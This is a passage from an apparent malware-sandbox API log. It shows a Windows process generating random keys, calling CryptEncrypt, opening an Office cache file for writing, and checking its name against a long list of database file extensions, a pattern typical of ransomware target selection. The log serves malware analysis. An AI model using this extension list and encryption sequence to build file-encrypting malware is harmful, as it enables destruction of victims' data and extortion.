lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0151.074] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1428 | out: hHeap=0xea0000) returned 1 [0151.074] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef25d8 | out: hHeap=0xea0000) returned 1 [0151.074] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0151.074] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0151.074] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0151.074] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab")) returned 0x2020 [0151.075] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0151.075] GetLastError () returned 0x0 [0151.075] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=14819276) returned 1 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".4dd") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".4dl") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".accdb") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".accdc") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".accde") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".accdr") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".accdt") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".accft") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".adb") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ade") returned 0x0 [0151.075] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".adf") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".adp") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".arc") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ora") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".alf") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ask") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".btr") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".bdf") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".cat") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".cdb") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ckp") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".cma") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".cpd") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dacpac") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dad") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dadiagrams") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".daschema") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".db") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".db-shm") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".db-wal") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".db3") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dbc") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dbf") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dbs") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dbt") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dbv") returned 0x0 [0151.076] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dbx") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dcb") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dct") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dcx") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ddl") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dlis") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dp1") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dqy") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dsk") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dsn") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dtsx") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".dxl") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".eco") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ecx") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".edb") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".epim") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".exb") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fcd") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fdb") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fic") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fmp") returned 0x0 [0151.077] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fmp12") returned 0x0 [0151.078] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fmpsl") returned 0x0 [0151.078] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fol") returned 0x0 [0151.078] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fp3") returned 0x0 [0151.078] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fp4") returned 0x0 [0151.079] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fp5") returned 0x0 [0151.079] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fp7") returned 0x0 [0151.079] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".fpt") returned 0x0 [0151.079] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".frm") returned 0x0 [0151.079] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".gdb") returned 0x0 [0151.082] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".grdb") returned 0x0 [0151.083] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".gwi") returned 0x0 [0151.083] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".hdb") returned 0x0 [0151.083] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".his") returned 0x0 [0151.083] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ib") returned 0x0 [0151.083] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".idb") returned 0x0 [0151.083] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ihx") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".itdb") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".itw") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".jet") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".jtx") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".kdb") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".kexi") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".kexic") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".kexis") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".lgc") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".lwx") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".maf") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".maq") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mar") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mas") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mav") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mdb") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mdf") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mpd") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mrg") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mud") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".mwb") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".myd") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ndf") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".nnt") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".nrmlib") returned 0x0 [0151.084] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ns2") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ns3") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".ns4") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".nsf") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".nv") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".nv2") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".nwdb") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".nyf") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".odb") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".oqy") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".orx") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".owc") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".p96") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".p97") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".pan") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".pdb") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".pdm") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".pnz") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".qry") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".qvd") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".rbf") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".rctd") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".rod") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".rodx") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".rpd") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".rsd") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sas7bdat") returned 0x0 [0151.085] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sbf") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".scx") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sdb") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sdc") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sdf") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sis") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".spq") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sql") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sqlite") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sqlite3") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".sqlitedb") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".te") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".temx") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".tmd") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".tps") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".trc") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".trm") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".udb") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".udl") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".usr") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".v12") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vis") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vpd") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".vvv") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".wdb") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".wmdb") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".wrk") returned 0x0 [0151.086] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".xdb") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".xld") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".xmlff") returned 0x0 [0151.087] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpSrch=".abcddb") returned 0x0 [0151.087] StrStrIW 